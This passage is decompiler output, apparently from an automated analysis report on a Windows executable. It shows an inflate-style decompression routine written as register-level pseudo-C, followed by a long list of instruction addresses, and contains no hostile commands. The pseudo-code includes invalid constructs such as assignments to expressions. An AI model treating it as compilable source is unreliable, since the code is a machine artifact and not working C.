												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x4093d4 + __eax * 2) & 0x0000ffff =  *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x4093d4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x4093d4 + __eax * 2) & 0x0000ffff =  *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3b8;
												if( *0x42e3b8 != 0) {
													L22:
													_t412 =  *0x4093f8; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x4093fc; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d234; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d230; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d238;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6b8;
													if(_t416 < 0x42d6b8) {
														L15:
														__eflags = _t416 - 0x42d474;
														_t438 = 8;
														if(_t416 > 0x42d474) {
															__eflags = _t416 - 0x42d638;
															if(_t416 >= 0x42d638) {
																__eflags = _t416 - 0x42d698;
																if(_t416 < 0x42d698) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E004068B0(0x42d238, 0x120, 0x101, 0x407328, 0x407368, 0x42d234, 0x4093f8, 0x42db38, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d238, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d238 + _t440;
														E004068B0(0x42d238, 0x1e, 0, 0x4073a8, 0x4073e4, 0x42d230, 0x4093fc, 0x42db38, _t448 - 8);
														 *0x42e3b8 =  *0x42e3b8 + 1;
														__eflags =  *0x42e3b8;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x10;
												if(__ebx >= 0x10) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E0040568C( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x4093d4 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x4093d4 + __eax * 2) & 0x0000ffff =  *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x4093d4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E004068B0( &(__esi[3]), __edi, 0x101, 0x407328, 0x407368, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E004068B0(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x4073a8, 0x4073e4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406848( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}









                                                0x004060d9
                                                0x004060d9
                                                0x004060d9
                                                0x004060d9
                                                0x004060d9
                                                0x004060dd
                                                0x00000000
                                                0x00000000
                                                0x004060e3
                                                0x004060e3
                                                0x004060e6
                                                0x004060e9
                                                0x004060ee
                                                0x004060f0
                                                0x004060f3
                                                0x004060f6
                                                0x004060f9
                                                0x004060f9
                                                0x004060fc
                                                0x00000000
                                                0x00000000
                                                0x004060fe
                                                0x004060fe
                                                0x00406101
                                                0x00406106
                                                0x00406108
                                                0x0040610b
                                                0x00406111
                                                0x00405e70
                                                0x00405e70
                                                0x00405e73
                                                0x00405e79
                                                0x00405e7f
                                                0x00405e88
                                                0x00405e8e
                                                0x00405e91
                                                0x00405e98
                                                0x00405e9d
                                                0x00405ea3
                                                0x00405eae
                                                0x00405eae
                                                0x00406117
                                                0x00406117
                                                0x00406121
                                                0x00000000
                                                0x00000000
                                                0x00406127
                                                0x00406127
                                                0x0040612b
                                                0x0040612e
                                                0x0040612e
                                                0x00406132
                                                0x00406138
                                                0x00406138
                                                0x0040613b
                                                0x0040613e
                                                0x00406144
                                                0x00000000
                                                0x00000000
                                                0x00406146
                                                0x00406168
                                                0x00406168
                                                0x0040616b
                                                0x00000000
                                                0x00000000
                                                0x00406148
                                                0x0040614c
                                                0x00000000
                                                0x00000000
                                                0x00406152
                                                0x00406152
                                                0x00406155
                                                0x00406158
                                                0x0040615d
                                                0x0040615f
                                                0x00406162
                                                0x00406165
                                                0x00406165
                                                0x0040616d
                                                0x0040616d
                                                0x00406173
                                                0x00406176
                                                0x00406179
                                                0x00406179
                                                0x00406180
                                                0x00406184
                                                0x00406188
                                                0x0040618b
                                                0x0040618e
                                                0x00406194
                                                0x00406199
                                                0x00000000
                                                0x00000000
                                                0x0040619b
                                                0x004061af
                                                0x004061af
                                                0x004061b3
                                                0x00000000
                                                0x00000000
                                                0x0040619d
                                                0x004061a0
                                                0x004061a0
                                                0x004061a7
                                                0x004061ac
                                                0x004061ac
                                                0x004061ac
                                                0x004061b5
                                                0x004061b5
                                                0x004061b8
                                                0x004061c6
                                                0x004061cc
                                                0x004061d1
                                                0x004061d7
                                                0x004061dd
                                                0x004061e3
                                                0x004061ea
                                                0x004061fe
                                                0x004061fe
                                                0x004067cd
                                                0x004067cd
                                                0x004067cd
                                                0x004067d2
                                                0x00000000
                                                0x00000000
                                                0x00405e0a
                                                0x00405e0a
                                                0x00000000
                                                0x00406405
                                                0x00406405
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x00406412
                                                0x00000000
                                                0x00000000
                                                0x00406418
                                                0x00406418
                                                0x0040643d
                                                0x0040643d
                                                0x0040643d
                                                0x0040643f
                                                0x00000000
                                                0x00000000
                                                0x0040641d
                                                0x0040641d
                                                0x00406421
                                                0x00000000
                                                0x00000000
                                                0x00406427
                                                0x00406427
                                                0x0040642a
                                                0x0040642d
                                                0x00406430
                                                0x00406432
                                                0x00406434
                                                0x00406437
                                                0x0040643a
                                                0x0040643a
                                                0x0040643a
                                                0x00406441
                                                0x00406441
                                                0x00406449
                                                0x0040644c
                                                0x0040644f
                                                0x00406452
                                                0x00406456
                                                0x00406459
                                                0x0040645b
                                                0x0040645e
                                                0x00406460
                                                0x00406474
                                                0x00406474
                                                0x00406477
                                                0x00406491
                                                0x00406491
                                                0x00406494
                                                0x00000000
                                                0x00000000
                                                0x0040649a
                                                0x0040649a
                                                0x0040649d
                                                0x00000000
                                                0x00000000
                                                0x004064a3
                                                0x004064a3
                                                0x00000000
                                                0x004064a3
                                                0x00406479
                                                0x0040647c
                                                0x00406483
                                                0x00406486
                                                0x00000000
                                                0x00406486
                                                0x00406462
                                                0x00406466
                                                0x00406469
                                                0x00000000
                                                0x00000000
                                                0x004064ae
                                                0x004064ae
                                                0x004064d3
                                                0x004064d3
                                                0x004064d3
                                                0x004064d5
                                                0x00000000
                                                0x00000000
                                                0x004064b3
                                                0x004064b3
                                                0x004064b7
                                                0x00000000
                                                0x00000000
                                                0x004064bd
                                                0x004064bd
                                                0x004064c0
                                                0x004064c3
                                                0x004064c6
                                                0x004064c8
                                                0x004064ca
                                                0x004064cd
                                                0x004064d0
                                                0x004064d0
                                                0x004064d0
                                                0x004064d7
                                                0x004064df
                                                0x004064e2
                                                0x004064e5
                                                0x004064e7
                                                0x004064ea
                                                0x004064ea
                                                0x004064ec
                                                0x004064f0
                                                0x004064f3
                                                0x004064f6
                                                0x004064f9
                                                0x00000000
                                                0x00000000
                                                0x004064ff
                                                0x004064ff
                                                0x00406524
                                                0x00406524
                                                0x00406524
                                                0x00406526
                                                0x00000000
                                                0x00000000
                                                0x00406504
                                                0x00406504
                                                0x00406508
                                                0x00000000
                                                0x00000000
                                                0x0040650e
                                                0x0040650e
                                                0x00406511
                                                0x00406514
                                                0x00406517
                                                0x00406519
                                                0x0040651b
                                                0x0040651e
                                                0x00406521
                                                0x00406521
                                                0x00406521
                                                0x00406528
                                                0x00406528
                                                0x00406530
                                                0x00406533
                                                0x00406536
                                                0x00406539
                                                0x0040653d
                                                0x00406540
                                                0x00406542
                                                0x00406545
                                                0x00406548
                                                0x00406562
                                                0x00406562
                                                0x00406565
                                                0x00000000
                                                0x00000000
                                                0x0040656b
                                                0x0040656b
                                                0x0040656e
                                                0x00406575
                                                0x00000000
                                                0x00406575
                                                0x0040654a
                                                0x0040654d
                                                0x00406554
                                                0x00406557
                                                0x00000000
                                                0x00000000
                                                0x0040657d
                                                0x0040657d
                                                0x004065a2
                                                0x004065a2
                                                0x004065a2
                                                0x004065a4
                                                0x00000000
                                                0x00000000
                                                0x00406582
                                                0x00406582
                                                0x00406586
                                                0x00000000
                                                0x00000000
                                                0x0040658c
                                                0x0040658c
                                                0x0040658f
                                                0x00406592
                                                0x00406595
                                                0x00406597
                                                0x00406599
                                                0x0040659c
                                                0x0040659f
                                                0x0040659f
                                                0x0040659f
                                                0x004065a6
                                                0x004065ae
                                                0x004065b1
                                                0x004065b4
                                                0x004065b6
                                                0x004065b9
                                                0x004065b9
                                                0x004065bb
                                                0x00000000
                                                0x00000000
                                                0x004065c1
                                                0x004065c1
                                                0x004065c4
                                                0x004065c9
                                                0x004065cb
                                                0x004065d1
                                                0x004065d3
                                                0x004065e8
                                                0x004065ea
                                                0x004065ea
                                                0x004065d5
                                                0x004065db
                                                0x004065dd
                                                0x004065df
                                                0x004065df
                                                0x004065ec
                                                0x004065f0
                                                0x004065f3
                                                0x004065f9
                                                0x004065f9
                                                0x004065fc
                                                0x004065fc
                                                0x004065fc
